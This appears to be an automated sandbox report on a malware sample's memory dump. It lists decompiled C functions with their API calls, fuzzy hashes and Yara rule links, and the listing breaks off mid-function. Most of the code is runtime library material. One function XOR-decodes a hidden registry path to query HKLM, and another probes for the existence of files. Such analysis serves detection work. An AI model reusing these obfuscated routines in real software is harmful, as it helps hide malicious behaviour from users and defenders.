Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: a23c372d24e344cc6a4087b12bdb3a97facb6223cafd40d01f0b777b1525d680
Instruction ID: 348589393fa062bb7bc497f0fcd3f45cf349e94b481bb7395f86a4da128a54ee
Opcode Fuzzy Hash: a23c372d24e344cc6a4087b12bdb3a97facb6223cafd40d01f0b777b1525d680
Instruction Fuzzy Hash: 70018E31945118BBCB109F95DC08EDE7FB9EF06722F0002C5F824921A0CF728984DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B4A87E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B4A87E(void* __ebx, void* __edi, void* __esi) {
				signed int _t38;
				long _t45;
				void* _t48;
				void _t49;
				void _t50;
				void* _t62;
				int* _t64;
				char _t66;
				signed int _t69;
				intOrPtr* _t77;
				void* _t78;
				signed int _t79;
				void* _t81;
				void* _t90;
				void* _t91;
				signed int _t93;
				void* _t95;

				_t93 = _t95 - 0xd0;
				_t38 =  *0xb69014; // 0x7e8b4fb6
				 *(_t93 + 0xcc) = _t38 ^ _t93;
				_push(__edi);
				 *(_t93 - 0x7c) = 1;
				 *(_t93 - 0x74) = 0;
				E00B4D0F0(__edi, _t93 - 0x34, 0, 0xff);
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x70], xmm0");
				_t64 = 0;
				 *(_t93 - 0x78) = 0xff;
				asm("movaps xmm0, [0xb3dca0]");
				asm("movups [ebp-0x60], xmm0");
				 *((intOrPtr*)(_t93 - 0x50)) = 0xd071312;
				 *((intOrPtr*)(_t93 - 0x4c)) = 0x15033310;
				 *((intOrPtr*)(_t93 - 0x48)) = 0x505001b;
				 *((char*)(_t93 - 0x44)) = 0;
				do {
					_t11 = _t64 + 0x40; // 0x40
					 *(_t93 + _t64 - 0x70) =  *(_t93 + _t64 - 0x70) ^ _t11;
					_t64 = _t64 + 1;
				} while (_t64 < 0x2c);
				 *((char*)(_t93 - 0x44)) = 0;
				_t45 = RegOpenKeyExA(0x80000002, _t93 - 0x70, 0, 0x20019, _t93 - 0x74); // executed
				if(_t45 == 0) {
					 *((intOrPtr*)(_t93 - 0x40)) = 0x2f2b3402;
					 *((intOrPtr*)(_t93 - 0x3c)) = 0x25270920;
					 *((short*)(_t93 - 0x38)) = 0x310d;
					 *((char*)(_t93 - 0x36)) = 0;
					RegQueryValueExA( *(_t93 - 0x74), E00B4282B(_t93 - 0x40), 0, _t93 - 0x7c, _t93 - 0x34, _t93 - 0x78); // executed
				}
				_push(0x104);
				_t62 = E00B509A2();
				_t77 = _t93 - 0x34;
				_t90 = _t62 - _t77;
				do {
					_t66 =  *_t77;
					 *((char*)(_t77 + _t90)) = _t66;
					_t77 = _t77 + 1;
				} while (_t66 != 0);
				 *((intOrPtr*)(_t93 - 0x40)) = 0x757a391f;
				 *((intOrPtr*)(_t93 - 0x3c)) = 0x2e342409;
				 *((short*)(_t93 - 0x38)) = 0x29;
				_t48 = E00B42D10(_t93 - 0x40);
				_t78 = _t48;
				_t91 = _t48;
				do {
					_t49 =  *_t78;
					_t78 = _t78 + 1;
				} while (_t49 != 0);
				_t79 = _t78 - _t91;
				_t34 = _t62 - 1; // -1
				_t81 = _t34;
				do {
					_t50 =  *(_t81 + 1);
					_t81 = _t81 + 1;
				} while (_t50 != 0);
				_t69 = _t79 >> 2;
				memcpy(_t81, _t91, _t69 << 2);
				memcpy(_t91 + _t69 + _t69, _t91, _t79 & 0x00000003);
				return E00B4AE43( *(_t93 + 0xcc) ^ _t93);
			}

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?,00000000,?,00000000), ref: 00B4A911
RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00B4A94B

Strings

$4., xrefs: 00B4A97B

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenQueryValue
String ID: $4.
API String ID: 4153817207-83132562
Opcode ID: a8b5799eeee6d1fff869213870b1b163d9dea9df9816078679d00cbc6661dc4b
Instruction ID: f524b3aa817b0ef596cd5cbfada8d9400b688f836806561829ac46d44d35a8bf
Opcode Fuzzy Hash: a8b5799eeee6d1fff869213870b1b163d9dea9df9816078679d00cbc6661dc4b
Instruction Fuzzy Hash: CB41B471D0425C9FDB25DFA9DC90AEEBBB8FF44304F20026DE845A7212EB705A49DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AA59, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5AA59(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E00B5AA22(_t26) - _t26 >> 1;
					_t7 = E00B5A975(0, 0, _t26, E00B5AA22(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E00B56F1C(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E00B5A975(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E00B564B8(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

APIs

GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,00B6102D,00000000,00000001,?,?,00000000), ref: 00B5AA62
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00B6102D,00000000,00000001,?,?,00000000), ref: 00B5AAD0

Part of subcall function 00B5A975: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00B592F5,?,00000000,00000000), ref: 00B5AA17

Part of subcall function 00B56F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B56F4E

_free.LIBCMT ref: 00B5AAC1

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: fe6ef6b098ed3aec246e9d747f1a8d239b2733b259236ca1d8c1bc85ac9e711d
Instruction ID: f28da5049e718e04cc00ee7f393ace93bfa9e5f51babecb78fd7169353c3f955
Opcode Fuzzy Hash: fe6ef6b098ed3aec246e9d747f1a8d239b2733b259236ca1d8c1bc85ac9e711d
Instruction Fuzzy Hash: 1101D462A016153F273155A61D89E7B6AEDCEC7B9235903E8FD04E3241EE658D09C1F2

Uniqueness

Uniqueness Score: -1.00%

Function 00B58BA1, Relevance: 4.6, APIs: 3, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B58BA1(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00B5B205(_t33) != 0xffffffff) {
					_t13 =  *0xb6a6c8; // 0x6772c8
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00B5B205(2);
						if(E00B5B205(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E00B5B205(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00B5B174(_t33);
						 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E00B55B87(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00B58AD7,?,00B66260,0000000C,00B58B7F,?), ref: 00B58BF7
GetLastError.KERNEL32(?,00B58AD7,?,00B66260,0000000C,00B58B7F,?), ref: 00B58C01
__dosmaperr.LIBCMT ref: 00B58C2C

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 32f02c999e3a5711010a6f2b330c117dd9b203db9df4d6cec69440d2d8cf968a
Instruction ID: 666438eef93175f40b545349cb120b431389e4131f8b5748c2c742d9fa658d3c
Opcode Fuzzy Hash: 32f02c999e3a5711010a6f2b330c117dd9b203db9df4d6cec69440d2d8cf968a
Instruction Fuzzy Hash: 52012B326051245BDA211634A885F7D27DDCB82B37F2902DDFD15BB1E1EF678C8D4260

Uniqueness

Uniqueness Score: -1.00%

Function 00B571AB, Relevance: 4.6, APIs: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B571AB(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				signed int _t32;
				signed int _t33;
				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00B5B205(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					if(_t16 != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							 *( *((intOrPtr*)(0xb6a6c8 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0xb6a6c8 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x38) & 0x000000fd;
						}
					} else {
						E00B55B87(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E00B55BBD())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}

APIs

SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,00B572E9,00000000,?,?,00000002), ref: 00B571E4
GetLastError.KERNEL32(?,00B572E9,00000000,?,?,00000002,?,00B51304,?,00000000,00000000,00000001,?,?,?,00B513BA), ref: 00B571EE
__dosmaperr.LIBCMT ref: 00B571F5

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 4acc9260e732fd3cd2c5e0d025cf6a72a9b685d01a9a1414b847b9647b70cdee
Instruction ID: 7d1ac932b3254300415ea7d6f8ea590f57451a20f0bdb84603ab63e56c799dce
Opcode Fuzzy Hash: 4acc9260e732fd3cd2c5e0d025cf6a72a9b685d01a9a1414b847b9647b70cdee
Instruction Fuzzy Hash: 4C012D327145186FCB158F54EC45EAE3B69DB85332B2402C5FC11A7190EE71DD408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B42D46, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B42D46(void* __ebx, void* __edi, void* __esi) {
				signed int _t20;
				intOrPtr* _t24;
				void _t27;
				void _t28;
				void* _t31;
				void _t32;
				void _t33;
				void* _t34;
				void* _t36;
				void _t37;
				void _t38;
				int _t41;
				intOrPtr* _t45;
				char _t49;
				signed int _t51;
				signed int _t57;
				signed int _t64;
				void* _t72;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				void* _t80;
				void* _t85;
				void* _t90;
				void* _t97;
				void* _t98;
				void* _t99;
				char* _t102;
				signed int _t104;
				void* _t106;
				void* _t107;
				void* _t108;

				_t20 =  *0xb69014; // 0x7e8b4fb6
				 *(_t104 + 0xc) = _t20 ^ _t104;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = 0xb6ab00;
				E00B4A476(0xb6ab00, __edi, __esi, 0xb6ab00);
				_push(0x104);
				_t102 = E00B509A2();
				do {
					_t24 = E00B5187C( *_t45);
					_t72 = _t102 - _t24;
					do {
						_t49 =  *_t24;
						 *((char*)(_t72 + _t24)) = _t49;
						_t24 = _t24 + 1;
					} while (_t49 != 0);
					 *((char*)(_t104 + 0x11)) = _t49;
					 *((char*)(_t104 + 0x11)) = _t49;
					_t73 = _t104 + 0x10;
					 *(_t104 + 0x10) = 0x5c;
					_t97 = _t73;
					do {
						_t27 =  *_t73;
						_t73 = _t73 + 1;
					} while (_t27 != 0);
					_t74 = _t73 - _t97;
					_t7 = _t102 - 1; // -1
					_t80 = _t7;
					do {
						_t28 =  *(_t80 + 1);
						_t80 = _t80 + 1;
					} while (_t28 != 0);
					_t51 = _t74 >> 2;
					memcpy(_t80, _t97, _t51 << 2);
					_t54 = _t74 & 0x00000003;
					memcpy(_t97 + _t51 + _t51, _t97, _t74 & 0x00000003);
					_t106 = _t104 + 0x18;
					_t31 = E00B4A87E(_t45, _t97 + (_t74 & 0x00000003) + _t54, _t97);
					_t75 = _t31;
					_t98 = _t31;
					do {
						_t32 =  *_t75;
						_t75 = _t75 + 1;
					} while (_t32 != 0);
					_t76 = _t75 - _t98;
					_t10 = _t102 - 1; // -1
					_t85 = _t10;
					do {
						_t33 =  *(_t85 + 1);
						_t85 = _t85 + 1;
					} while (_t33 != 0);
					 *((intOrPtr*)(_t106 + 0x14)) = 0x2f2e256e;
					_t57 = _t76 >> 2;
					_t34 = memcpy(_t85, _t98, _t57 << 2);
					_t107 = _t106 + 0xc;
					 *(_t107 + 0x18) = _t34;
					memcpy(_t98 + _t57 + _t57, _t98, _t76 & 0x00000003);
					_t108 = _t107 + 0xc;
					_t15 = _t108 + 0x14; // 0x2f2e256e
					_t36 = E00B432BE(_t15);
					_t77 = _t36;
					_t99 = _t36;
					do {
						_t37 =  *_t77;
						_t77 = _t77 + 1;
					} while (_t37 != 0);
					_t78 = _t77 - _t99;
					_t16 = _t102 - 1; // -1
					_t90 = _t16;
					do {
						_t38 =  *(_t90 + 1);
						_t90 = _t90 + 1;
					} while (_t38 != 0);
					_t64 = _t78 >> 2;
					memcpy(_t90, _t99, _t64 << 2);
					memcpy(_t99 + _t64 + _t64, _t99, _t78 & 0x00000003);
					_t104 = _t108 + 0x18;
					_t41 = PathFileExistsA(_t102); // executed
					if(_t41 == 0) {
						goto L16;
					}
					L19:
					return E00B4AE43( *(_t104 + 0x1c) ^ _t104);
					L16:
					_t45 = _t45 + 4;
				} while (_t45 < 0xb6ab14);
				goto L19;
			}

APIs

PathFileExistsA.KERNELBASE(00000000), ref: 00B42E25

Strings

n%./, xrefs: 00B42DF5

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExistsFilePath
String ID: n%./
API String ID: 1174141254-1693314898
Opcode ID: 98fc12a25bafa4c14a38774d4e881f4bd02ff4581160562f23c24e30b6951b97
Instruction ID: 259f117bf15c2ba9ce1c758bb0e0fab2b600c603449dc53bdcd629e24d21d660
Opcode Fuzzy Hash: 98fc12a25bafa4c14a38774d4e881f4bd02ff4581160562f23c24e30b6951b97
Instruction Fuzzy Hash: 9E315C516086420F5F19DF3C58212BFBBD2EFD634078445E8E8D297346DE215E0EE7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B50A3F, Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B50A3F(signed int __edx, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				signed char _t61;
				signed int _t63;
				signed char _t70;
				signed char _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				intOrPtr _t78;
				signed int _t86;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t116;

				_t97 = __edx;
				if(_a4 != 0) {
					_t58 = E00B572EE(_a4);
					_t90 = _a4;
					_t106 = _t58;
					__eflags =  *(_t90 + 8);
					if( *(_t90 + 8) < 0) {
						 *(_t90 + 8) = 0;
					}
					_t59 = E00B572B8(_t106, 0, 0, 1); // executed
					_t91 = _t97;
					_t116 = _t115 + 0x10;
					_v12 = _t91;
					_t111 = _t59;
					_v24 = _t111;
					__eflags = _t91;
					if(__eflags > 0) {
						L7:
						_t61 =  *(_a4 + 0xc);
						__eflags = _t61 & 0x000000c0;
						if((_t61 & 0x000000c0) != 0) {
							_t63 = _t106 >> 6;
							_t92 = (_t106 & 0x0000003f) * 0x38;
							_v16 = _t63;
							_v20 = _t92;
							_t93 = _a4;
							_v8 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(0xb6a6c8 + _t63 * 4)) + 0x29));
							_t94 =  *(_t93 + 0xc);
							asm("cdq");
							_t108 =  *_t93 -  *((intOrPtr*)(_t93 + 4));
							_t86 = _t97;
							__eflags = _t94 & 0x00000003;
							if((_t94 & 0x00000003) == 0) {
								_t70 =  *(_a4 + 0xc) >> 2;
								__eflags = _t70 & 0x00000001;
								if((_t70 & 0x00000001) != 0) {
									L18:
									_t112 = _a4;
									L19:
									_t95 = _v24;
									_t98 = _v12;
									__eflags = _t95 | _t98;
									if((_t95 | _t98) != 0) {
										_t73 =  *(_t112 + 0xc);
										__eflags = _t73 & 0x00000001;
										if((_t73 & 0x00000001) == 0) {
											__eflags = _v8 - 1;
											if(_v8 == 1) {
												_t75 = E00B64ED0(_t108, _t86, 2, 0);
												_t95 = _v24;
												_t108 = _t75;
											}
											_t108 = _t108 + _t95;
											asm("adc edx, ebx");
											L26:
											_t74 = _t108;
											goto L27;
										}
										_t74 = E00B50BC8(_a4, _t95, _t98, _t108, _t86);
										goto L27;
									}
									goto L26;
								}
								_t59 = E00B55BBD();
								 *_t59 = 0x16;
								goto L17;
							}
							__eflags = _v8 - 1;
							_t96 = _v16;
							_t102 = _v20;
							if(_v8 != 1) {
								L13:
								_t76 =  *((intOrPtr*)(0xb6a6c8 + _t96 * 4));
								__eflags =  *((char*)(_t102 + _t76 + 0x28));
								if( *((char*)(_t102 + _t76 + 0x28)) >= 0) {
									goto L18;
								}
								_t112 = _a4;
								_t77 = E00B50F24( *((intOrPtr*)(_t112 + 4)),  *_t112, _v8);
								_t116 = _t116 + 0xc;
								_t108 = _t108 + _t77;
								asm("adc ebx, edx");
								goto L19;
							}
							_t78 =  *((intOrPtr*)(0xb6a6c8 + _t96 * 4));
							__eflags =  *(_t102 + _t78 + 0x2d) & 0x00000002;
							if(( *(_t102 + _t78 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t74 = E00B50D89(_t86, _t108, _t111, _a4, _t111, _v12);
							goto L27;
						}
						asm("cdq");
						_t74 = _t111 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ecx, edx");
						goto L27;
					} else {
						if(__eflags < 0) {
							L17:
							_t74 = _t59 | 0xffffffff;
							L27:
							return _t74;
						}
						__eflags = _t111;
						if(_t111 < 0) {
							goto L17;
						}
						goto L7;
					}
				}
				 *((intOrPtr*)(E00B55BBD())) = 0x16;
				return E00B528EC() | 0xffffffff;
			}

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2365dd5eacc65c3c6cdd9eae6a1093b3e97f57b8538579a9ab7d8113f9476d0b
Instruction ID: d41646c2cad0681c8e64c8d21194c185906c652467c4dc6e4a22e03696d32a81
Opcode Fuzzy Hash: 2365dd5eacc65c3c6cdd9eae6a1093b3e97f57b8538579a9ab7d8113f9476d0b
Instruction Fuzzy Hash: 0B41E870A10108AFDB14EF58C8C1BA97BE1EF49369F2881E8FC48AB351D7719D49C751

Uniqueness

Uniqueness Score: -1.00%

Function 00B588EC, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B588EC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;
				void* _t35;

				E00B586BD(_t35,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				}
				_t26 = E00B61E53( &_v8, _a4, _v20, _a12, 0x180); // executed
				if(_t26 != 0) {
					goto L3;
				}
				 *0xb6a6c4 =  *0xb6a6c4 + 1;
				asm("lock or [eax], ecx");
				 *((intOrPtr*)(_a16 + 8)) = 0;
				 *((intOrPtr*)(_a16 + 0x1c)) = 0;
				 *((intOrPtr*)(_a16 + 4)) = 0;
				 *_a16 = 0;
				 *((intOrPtr*)(_a16 + 0x10)) = _v8;
				return _a16;
			}

APIs

__wsopen_s.LIBCMT ref: 00B58926

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b3cb8b342a06ee029657eb679751cb05c2b2606fdf6fde61f7cf7d4248824aac
Instruction ID: a3ae17a7773bca563d3144d28c4674d38f7ad45e8f30474afcb6b4ab0927c7b2
Opcode Fuzzy Hash: b3cb8b342a06ee029657eb679751cb05c2b2606fdf6fde61f7cf7d4248824aac
Instruction Fuzzy Hash: D3115A71904109AFCF05DF59E940AAA7BF4EF48300F054099FC08AB311DB31DE25CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AE4B, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00B5AE4B(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00B598AF(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00B5DC74(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00B564B8(0);
				return _t35;
			}

APIs

Part of subcall function 00B598AF: RtlAllocateHeap.NTDLL(00000008,00B425BB,00000000,?,00B584AF,00000001,00000364,00000007,000000FF,?,00000000,00000002,00B55BC2,00B56F5F,00000000), ref: 00B598F0

_free.LIBCMT ref: 00B5AEBA

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: ac3c2c73486597c72f60784f2502c66ce72c7f47e510888adfe57c2d214f5964
Instruction ID: f6260fbe64dba2076ce5b9805fafa3ae5567c0192821973bc5688a0aa8d043f7
Opcode Fuzzy Hash: ac3c2c73486597c72f60784f2502c66ce72c7f47e510888adfe57c2d214f5964
Instruction Fuzzy Hash: 9D012B726043165BC3309F98D885A99FBD8EB05371F5403D9ED44B76C0D7706C18C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B510AF, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B510AF(void* __ecx, intOrPtr _a4) {
				void* _t16;
				signed int _t24;
				signed int _t25;
				intOrPtr _t27;

				_t27 = _a4;
				if(_t27 == 0) {
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					return E00B528EC() | 0xffffffff;
				}
				_push(_t24);
				_t25 = _t24 | 0xffffffff;
				if(( *(_t27 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t25 = E00B58E48(_t27);
					E00B58C3D(_t27);
					_t16 = E00B58B12(E00B572EE(_t27)); // executed
					if(_t16 >= 0) {
						if( *(_t27 + 0x1c) != 0) {
							E00B564B8( *(_t27 + 0x1c));
							 *(_t27 + 0x1c) =  *(_t27 + 0x1c) & 0x00000000;
						}
					} else {
						_t25 = _t25 | 0xffffffff;
					}
				}
				E00B585BE(_t27);
				return _t25;
			}

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dd8b88350270aaf24a09ddd4470c35913539a64d84663df9b0b228a94f877a7
Instruction ID: 84c4f11138dcf8aa5796d93a2edf5cdcc7f034c2f74e8af58a5ed54a0e107839
Opcode Fuzzy Hash: 5dd8b88350270aaf24a09ddd4470c35913539a64d84663df9b0b228a94f877a7
Instruction Fuzzy Hash: E5F0F432901A141BDA213A2E9C06B6A32DC8F52337F140BD5FE75A31D2DF78D80E86E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B61DE3, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B61DE3(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
